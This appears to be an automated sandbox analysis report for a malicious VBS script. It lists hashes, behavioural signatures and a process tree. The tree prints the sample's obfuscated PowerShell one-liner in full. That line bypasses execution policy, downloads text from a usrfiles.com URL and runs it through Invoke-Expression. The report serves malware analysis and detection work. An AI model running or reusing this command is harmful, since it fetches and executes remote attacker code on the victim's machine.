Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
30/06/2023, 01:55
Static task
static1
Behavioral task
behavioral1
Sample
ed660ae4e1ff7e57c133b6d3d0a72bd41d6058cd2fe827466afd9d1d372fd4b1.vbs
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
ed660ae4e1ff7e57c133b6d3d0a72bd41d6058cd2fe827466afd9d1d372fd4b1.vbs
Resource
win10v2004-20230621-en
General
-
Target
ed660ae4e1ff7e57c133b6d3d0a72bd41d6058cd2fe827466afd9d1d372fd4b1.vbs
-
Size
11KB
-
MD5
a6ecc90056e3e910c3b39624f708eb66
-
SHA1
72f6cdcdcf0114e50061a40078bc7cc60f7cd95e
-
SHA256
ed660ae4e1ff7e57c133b6d3d0a72bd41d6058cd2fe827466afd9d1d372fd4b1
-
SHA512
222c55a3bb009be3f13165db81297043135c89454fdcbafdd0864af90741272b94d127c525263766198165eeecba1749237cab5803e6442de995193b50278b7f
-
SSDEEP
192:Npy58UoGL9i5lB5HQmpikw1BRKsyj0B41HCAEcYnd5DvxR7Nl5:Cdps6mFqbKlv2zh
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 1344 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 924 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1344 wrote to memory of 924 1344 WScript.exe 28 PID 1344 wrote to memory of 924 1344 WScript.exe 28 PID 1344 wrote to memory of 924 1344 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ed660ae4e1ff7e57c133b6d3d0a72bd41d6058cd2fe827466afd9d1d372fd4b1.vbs"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Byps $zWnXt = 'Iwr'; $VvWeR = 'cff66d08-d3f8-42db-911c-ce670399a441.usrfiles.com/ugd/cff66d_18181a7547224af09ee0503331621ea6.txt'; &$zWnXt -Uri $VvWeR | .('{1}{0}'-f'calc','i').replace('calc','eX')2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924
-